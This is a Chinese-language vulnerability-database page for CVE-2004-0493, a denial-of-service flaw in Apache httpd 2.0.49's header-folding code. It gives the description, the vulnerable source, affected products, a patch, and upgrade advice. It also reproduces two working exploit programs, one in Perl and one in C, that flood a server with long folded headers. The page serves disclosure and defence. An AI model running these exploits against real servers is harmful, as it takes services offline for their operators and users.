CVE-2004-0493
CVSS6.4
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:45:44
NMCOE    

[原文]The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.


[CNNVD]Apache ap_escape_html内存分配远程拒绝服务漏洞(CNNVD-200408-043)

        
        Apache是一款开放源代码流行的Web服务程序。
        Apache ap_escape_html内存分配存在问题,远程攻击者可以利用这个漏洞对Apache服务程序进行拒绝服务攻击。
        问题存在于server/protocol.c ap_get_mime_headers_core:
        ------
         if (last_field != NULL) {
         if ((len > 0) && ((*field == '\t') || *field == ' ')) {
        ...
        fold_buf = (char *)apr_palloc(r->pool, alloc_len);
        -----
        如果头字段以TAB或SPACE开始,Apache就会分配内存给它。
        而在ap_escape_html(r->pool, last_field)函数中,last_field字段可以任意长,根据如下代码:
        ----
        int i, j;
        for (i = 0, j = 0; s[i] != '\0'; i++)
         if (s[i] == '<' || s[i] == '>')
         j += 3;
         else if (s[i] == '&')
         j += 4;
         if (j == 0)
         return apr_pstrmemdup(p, s, i);
         x = apr_palloc(p, i + j + 1);
        ----
        (i + j + 1)也可以是任意长度,导致分配任意内存,可消耗大量资源。在linux x86_64上证实发送820MB数据可以溢出(i+j+1),导致memcpy崩溃而引起拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ibm:http_server:2.0.47.1IBM IBM HTTP Server 2.0.47.1
cpe:/o:trustix:secure_linux:1.5Trustix Secure Linux 1.5
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0
cpe:/h:avaya:s8300:r2.0.0
cpe:/a:ibm:http_server:2.0.47IBM IBM HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.47Apache Software Foundation Apache HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.48Apache Software Foundation Apache HTTP Server 2.0.48
cpe:/a:ibm:http_server:2.0.42.1IBM IBM HTTP Server 2.0.42.1
cpe:/a:apache:http_server:2.0.49Apache Software Foundation Apache HTTP Server 2.0.49
cpe:/a:ibm:http_server:2.0.42IBM IBM HTTP Server 2.0.42
cpe:/h:avaya:converged_communications_server:2.0Avaya Converged Communications Server 2.0
cpe:/h:avaya:s8500:r2.0.0
cpe:/a:ibm:http_server:2.0.42.2IBM IBM HTTP Server 2.0.42.2
cpe:/h:avaya:s8700:r2.0.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10605The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and p...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0493
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-043
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html
(UNKNOWN)  FULLDISC  20040628 DoS in apache httpd 2.0.49, yet still apache much better than windows
http://marc.info/?l=bugtraq&m=108853066800184&w=2
(UNKNOWN)  BUGTRAQ  20040629 TSSA-2004-012 - apache
http://marc.info/?l=bugtraq&m=109181600614477&w=2
(UNKNOWN)  HP  SSRT4777
http://security.gentoo.org/glsa/glsa-200407-03.xml
(UNKNOWN)  GENTOO  GLSA-200407-03
http://www.apacheweek.com/features/security-20
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/features/security-20
http://www.guninski.com/httpd1.html
(UNKNOWN)  MISC  http://www.guninski.com/httpd1.html
http://www.mandriva.com/security/advisories?name=MDKSA-2004:064
(UNKNOWN)  MANDRAKE  MDKSA-2004:064
http://www.redhat.com/support/errata/RHSA-2004-342.html
(UNKNOWN)  REDHAT  RHSA-2004:342
http://www.securityfocus.com/bid/10619
(VENDOR_ADVISORY)  BID  10619
http://www.trustix.org/errata/2004/0039/
(UNKNOWN)  TRUSTIX  2004-0039
http://xforce.iss.net/xforce/xfdb/16524
(VENDOR_ADVISORY)  XF  apache-apgetmimeheaderscore-dos(16524)

- 漏洞信息

Apache ap_escape_html内存分配远程拒绝服务漏洞
中危 其他
2004-08-06 00:00:00 2005-10-20 00:00:00
远程  
        
        Apache是一款开放源代码流行的Web服务程序。
        Apache ap_escape_html内存分配存在问题,远程攻击者可以利用这个漏洞对Apache服务程序进行拒绝服务攻击。
        问题存在于server/protocol.c ap_get_mime_headers_core:
        ------
         if (last_field != NULL) {
         if ((len > 0) && ((*field == '\t') || *field == ' ')) {
        ...
        fold_buf = (char *)apr_palloc(r->pool, alloc_len);
        -----
        如果头字段以TAB或SPACE开始,Apache就会分配内存给它。
        而在ap_escape_html(r->pool, last_field)函数中,last_field字段可以任意长,根据如下代码:
        ----
        int i, j;
        for (i = 0, j = 0; s[i] != '\0'; i++)
         if (s[i] == '<' || s[i] == '>')
         j += 3;
         else if (s[i] == '&')
         j += 4;
         if (j == 0)
         return apr_pstrmemdup(p, s, i);
         x = apr_palloc(p, i + j + 1);
        ----
        (i + j + 1)也可以是任意长度,导致分配任意内存,可消耗大量资源。在linux x86_64上证实发送820MB数据可以溢出(i+j+1),导致memcpy崩溃而引起拒绝服务。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * Georgi Guninski提供如下第三方补丁:
        ----------------------------------
        Index: server/protocol.c
        ===============================================
        RCS file: /home/cvspublic/httpd-2.0/server/protocol.c,v
        retrieving revision 1.148
        diff -u -r1.148 protocol.c
        --- server/protocol.c 22 Apr 2004 22:38:03 -0000 1.148
        +++ server/protocol.c 13 Jun 2004 19:47:36 -0000
        @@ -716,6 +716,23 @@
         * continuations that span many many lines.
         */
         apr_size_t fold_len = last_len + len + 1; /* trailing null */
        +
        + if ((fold_len - 1) > r->server->limit_req_fieldsize) {
        + r->status = HTTP_BAD_REQUEST;
        + /* report what we have accumulated so far before the
        + * overflow (last_field) as the field with the problem
        + */
        + apr_table_setn(r->notes, "error-notes",
        + apr_pstrcat(r->pool,
        + "Size of a request header field "
        + "after folding "
        + "exceeds server limit.
        \n"
        + "
\n",

        + ap_escape_html(r->pool, last_field),
        + "
\n", NULL));
        + return;
        + }
        +
         if (fold_len > alloc_len) {
         char *fold_buf;
         alloc_len += alloc_len;
        ----------------------------------
        厂商补丁:
        Apache Software Foundation
        --------------------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://jakarta.apache.org/tomcat/index.html

- 漏洞信息 (360)

Apache HTTPd Arbitrary Long HTTP Headers DoS (EDBID:360)
multiple dos
2004-07-22 Verified
80 bkbll
N/A [点击下载]
#/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: http://www.guninski.com/httpd1.html
#
#version: apache 2 <2.0.49 apache 1 not tested.
#
#by bkbll bkbll#cnhonker.net http://www.cnhonker.com
#
#tail -f /var/log/messages
#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)
#

use IO::Socket::INET;

$host="10.10.10.114";
$port=80;
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die "new error$@\n";
binmode($sock);
$hostname="Host: $host";
$buf2='A'x50;
$buf4='A'x8183;
$len=length($buf2);
$buf="GET / HTTP/1.1\r\n";
send($sock,$buf,0) || die "send error:$@\n";
for($i= 0; $i < 2000000; $i++)
{
    $buf=" $buf4\r\n";
    send($sock,$buf,0) || die "send error:$@, target maybe have been D.o.S?\n";
}
$buf="$hostname\r\n";
$buf.="Content-Length: $len\r\n";

$buf.="\r\n";
$buf.=$buf2."\r\n\r\n";

send($sock,$buf,0) || die "send error:$@\n";
print "Ok, our buffer have send to target \n";
close($sock);		

- 漏洞信息 (371)

Apache HTTPd Arbitrary Long HTTP Headers DoS (c version) (EDBID:371)
linux dos
2004-08-02 Verified
0 n/a
N/A [点击下载]
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>

#define A 0x41
#define PORT 80

struct sockaddr_in hrm;

int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
int i,x;
char buf[300],a1[8132],a2[50],host[100],content[100];
char *ip=argv[1],*new=malloc(sizeof(int));
sprintf(new,"\r\n");
memset(a1,'\0',8132);
memset(host,'\0',100);
memset(content,'\0',100);
a1[0] = ' ';
for(i=1;i<8132;i++)
a1[i] = A;
if(argc<2)
{
printf("%s: IP\n",argv[0]);
exit(0);
}
x = conn(ip);
printf("[x] Connected to: %s.\n",inet_ntoa(hrm.sin_addr));
sprintf(host,"Host: %s\r\n",argv[1]);
sprintf(content,"Content-Length: 50\r\n");
sprintf(buf,"GET / HTTP/1.0\r\n");
write(x,buf,strlen(buf));
printf("[x] Sending buffer...");
for(i=0;i<2000;i++)
{
write(x,a1,strlen(a1));
write(x,new,strlen(new));
}
memset(buf,'\0',300);
strcpy(buf,host);
strcat(buf,content);
for(i=0;i<50;i++)
a2[i] = A;
strcat(buf,a2);
strcat(buf,"\r\n\r\n");
write(x,buf,strlen(buf));
printf("done!\n");
close(x);

}

// milw0rm.com [2004-08-02]
		

- 漏洞信息

7269
Multiple HTTP Server Input Header Folding DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Apache contains a flaw that may allow a remote denial of service. The issue is triggered when overly long header lines starting with either a TAB or SPACE character are processed by the "ap_get_mime_headers_core()" function, and will result in loss of availability for the service.

- 时间线

2004-06-28 Unknow
2004-07-21 Unknow

- 解决方案

Upgrade to version 2.0.50 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站